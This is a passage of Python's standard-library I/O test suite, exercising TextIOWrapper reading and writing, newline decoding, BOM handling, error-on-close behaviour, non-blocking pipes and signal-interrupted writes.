self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
